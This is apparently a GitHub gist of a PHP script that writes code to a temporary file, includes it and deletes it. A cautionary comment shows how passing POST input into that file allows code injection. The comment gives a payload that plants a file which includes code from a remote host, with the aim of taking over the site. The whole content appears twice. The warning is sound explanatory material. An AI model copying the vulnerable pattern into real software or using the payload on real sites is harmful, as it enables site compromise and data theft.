NewellServ/gist:735229

## gistfile1.php
<?php

//First we are going to define the php and html we want into a variable.
$variable = " echo 'Hello World!'; ";


//Now we are going to create a file and print the contents of our previous variable inside of it.  Meanwhile surrounding it with php tags
//del.php is the name of the file we are creating.
file_put_contents ('del.php','<?php'.$variable.'?>');

//include the file we just created
include('del.php');

//delete that file.
unlink('del.php');

?>

<!-- END SCRIPT - the following is security information -->
<?php
/*
Be very careful with what you do with this script.  It is extremely powerful.  Lets say we change it to the following.


for the following ignore the lines above the endscript tag
*/
?>
<?php
if (!($_POST)){
?>
<form method="post">
//this is where the user will type information
<input type="text" name="name">
<input type="submit" value="Submit">
</form>
<?php
}else{

     $input = $_POST['name'];
     $variable = " echo 'Hello ".$input."!'; ";
     file_put_contents ('del.php','<?php'.$variable.'?>');
     include('del.php');
     unlink('del.php');


}

?>


<?php
/*
Suppose the user typed in the following

'; file_put_contents ('new.php', '<?php include(http://www.mysite.com/); ?>'); echo 'done


now all of a sudden you create a file that looks like this

<?php
echo 'Hello ';
file_put_contents ('new.php', '<?php include(http://www.mysite.com/); ?>');
echo 'done!'; ";
?>

Yeah the file gets delete but before it was deleted it created new.php which includes any code he writes at mysite.com
A little guessing and I'm sure he can find your mysql configuration and your website is now his.


so be careful!
*/
?>
	<?php

	//First we are going to define the php and html we want into a variable.
	$variable = " echo 'Hello World!'; ";


	//Now we are going to create a file and print the contents of our previous variable inside of it. Meanwhile surrounding it with php tags
	//del.php is the name of the file we are creating.
	file_put_contents ('del.php','<?php'.$variable.'?>');

	//include the file we just created
	include('del.php');

	//delete that file.
	unlink('del.php');

	?>

	<!-- END SCRIPT - the following is security information -->
	<?php
	/*
	Be very careful with what you do with this script. It is extremely powerful. Lets say we change it to the following.


	for the following ignore the lines above the endscript tag
	*/
	?>
	<?php
	if (!($_POST)){
	?>
	<form method="post">
	//this is where the user will type information
	<input type="text" name="name">
	<input type="submit" value="Submit">
	</form>
	<?php
	}else{

	$input = $_POST['name'];
	$variable = " echo 'Hello ".$input."!'; ";
	file_put_contents ('del.php','<?php'.$variable.'?>');
	include('del.php');
	unlink('del.php');


	}

	?>


	<?php
	/*
	Suppose the user typed in the following

	'; file_put_contents ('new.php', '<?php include(http://www.mysite.com/); ?>'); echo 'done


	now all of a sudden you create a file that looks like this

	<?php
	echo 'Hello ';
	file_put_contents ('new.php', '<?php include(http://www.mysite.com/); ?>');
	echo 'done!'; ";
	?>

	Yeah the file gets delete but before it was deleted it created new.php which includes any code he writes at mysite.com
	A little guessing and I'm sure he can find your mysql configuration and your website is now his.


	so be careful!
	*/
	?>